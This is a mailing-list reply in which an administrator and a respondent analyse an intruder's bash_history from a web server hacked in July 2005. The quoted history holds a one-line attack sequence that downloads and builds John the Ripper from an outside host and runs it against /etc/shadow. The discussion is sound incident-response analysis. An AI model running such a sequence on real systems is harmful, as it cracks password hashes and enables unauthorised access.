[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: SSH compiled with backdoor
One of my web servers was hacked on July 17, 2005. bash_history
w wget geocities.com/cretu_2004/john-1.6.tar.gz;tar zxvf
john-1.6.tar.gz;rm -rf john-1.6.tar.gz;cd john-1.6/src;make
linux-x86-any-elf;cd ../run;./john /etc/shadow
According to john, a couple of users had weak passwords, but root
seemed well protected. From looking in all the bash_history, it
appears the hacker came in from the website account, and did an su
He might have escalated privileges to root from the website account
using a kernel root exploit. You did not mention whose bash_history
you provided but from the above john run is evident that he is already
running as root (as he is able to read /etc/shadow).
I wonder why he cracked those passwords if he already had root access.
Maybe he wanted to use them to propagate the attack to nearby systems
or to feed the vulnerable passwords to his personal password file.
BTW, 'securedro' seems to have been removed from Geocities, but not
'cretu_2004' (where the john sources are). The john sources downloaded
from there, though, seem to be the same as downloaded from Openwall. I
expected them to have "improved" the run/password.lst and add common
(for them) passwords there.